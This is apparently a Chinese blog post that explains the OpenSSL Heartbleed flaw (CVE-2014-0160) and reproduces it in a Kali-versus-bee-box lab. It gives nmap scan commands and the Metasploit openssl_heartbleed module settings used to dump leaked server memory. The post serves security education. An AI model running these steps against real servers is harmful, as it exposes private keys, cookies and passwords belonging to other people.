心脏滴血漏洞复现(CVE-2014-0160)

简介: 心脏滴血漏洞复现(CVE-2014-0160)

一、什么是心脏滴血

心脏出血漏洞”是指openssl这个开源软件中的一个漏洞,因为该软件使用到一个叫做heartbeat(中文名称为心跳)的扩展,恰恰是这个扩展出现了问题,所以才将这个漏洞形象的称为“心脏出血”;

二、什么是openssl

在计算机网络上,OpenSSL是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。

三、漏洞描述

Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。

四、漏洞危害

如同漏洞成因所讲,我们可以通过该漏洞读取每次攻击泄露出来的信息,所以可能也可以获取到服务器的私钥,用户cookie和密码等。

五、影响范围

OpenSSL1.0.1版本

六、漏洞利用

1.准备一台kali和一台装有OpenSSL1.0.1版本的虚拟机,这里用一个bee-box。

2.分别查看kali和bee-box的IP地址

640.png

640.png

kali ip:192.168.110.140

bee-box ip:192.168.110.146

3.用kali去ping bee-box检查连通性

640.png

4.用nmap -O 192.168.110.146 查看一下开放端口,看是开放这心脏滴血漏洞的8443端口。

640.png

以开放,然后我们用nmap 上带的ssl-heartbleed.nse脚本对目标机器进行扫描看是否存在该漏洞

nmap -sV -p 8443 --script ssl-heartbleed.nse 192.168.110.146

640.png

存在漏洞。

5.打开msf利用模块进行攻击

640.png

用search heartbleed搜索漏洞利用模块

640.png

使用模块use auxiliary/scanner/ssl/openssl_heartbleed

640.png

使用show options查看下要配置的参数

640.png

这里我们需要设置一下rhost和rport,这里的rport我们需要修改一下

set rhost 192.168.110.146

set rport 8443

640.png

最后设置一下verbose,让verbose为true这样我们才可以看到泄露的64kb数据

set  verbose true

640.png

这个时候就可以run来运行我们的漏洞利用模块了

640.png

可以看到一些泄露的数据,假如这是被攻击端正在输入一些私密的数据,我们就有可能获取到这些数据了。

目录
相关文章
|
2月前
|
安全 网络安全 数据安全/隐私保护
渗透测试-Openssl心脏出血漏洞复现
渗透测试-Openssl心脏出血漏洞复现
101 7
|
3月前
|
应用服务中间件 PHP nginx
CVE-2019-11043 复现
CVE-2019-11043 复现
74 5
|
3月前
|
安全 网络安全 Apache
CVE-2021-41773 复现
CVE-2021-41773 复现
208 1
|
6月前
|
SQL 安全 测试技术
渗透测试基础之永恒之蓝漏洞复现
对于当下来说我们使用的电脑大多是win11或是win10,还是有很多政府和公司,或是学校中使用的系统还停留在win7系统.今天是我进行渗透测试的第一次实战,通过永恒之蓝漏洞利用对win7系统进行渗透,当然也会对渗透测试的流程进行一个详细的介绍.,渗透测试的流程信息较为详细,内容较多,如果想看实战流程,直接通过通过这次的渗透测试,虽然不是对web间进行渗透测试,但是通过实战能够使我能够熟悉渗透测试的流程,当然在实践过程中也出现了很多问题,例如从kali上传文件到win主机路径出现问题,配置攻击模块时将ip地址设置错误,但在我不断的思考和尝试下,最终解决了问题,对于我的解决问题的能力也是一种提升.
331 3
|
安全 Java 应用服务中间件
CVE-2023-21839漏洞本地简单复现
CVE-2023-21839漏洞本地简单复现
1066 0
|
SQL 安全 前端开发
CVE-2021-35042Django SQL注入漏洞复现
CVE-2021-35042Django SQL注入漏洞复现
200 0
CVE-2021-35042Django SQL注入漏洞复现
|
安全 Linux 网络安全
【网络安全】复现CVE-2019-14287漏洞
Sudo的全称是"superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前提下,以其它用户的权限运行应用程序或命令,通常是以root用户身份运行命令,以减少root用户的登录和管理时间,同时提高安全性,当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo命令以root身份执行命令. 个人理解:(直白点讲就是,如果你入侵了他人的主机,可以利用该漏洞,进行权限升级,不用切换root,因为切换root的时候需要输入密码,用该漏洞可以跳过该步骤,获得权限)
211 0
【网络安全】复现CVE-2019-14287漏洞
|
安全 Apache 开发工具
[漏洞复现]CVE-2019-0708(上)
[漏洞复现]CVE-2019-0708
198 0
[漏洞复现]CVE-2019-0708(上)
|
安全 Python
[漏洞复现]CVE-2019-0708(下)
[漏洞复现]CVE-2019-0708
172 0
 [漏洞复现]CVE-2019-0708(下)
|
安全 关系型数据库 Linux
heartbleeder 自动检测 OpenSSL 心脏出血漏洞 (附修复指南)
heartbleeder 可以探测你的服务器是否存在 OpenSSL CVE-2014-0160 漏洞 (心脏出血漏洞)。
794 0
heartbleeder 自动检测 OpenSSL 心脏出血漏洞 (附修复指南)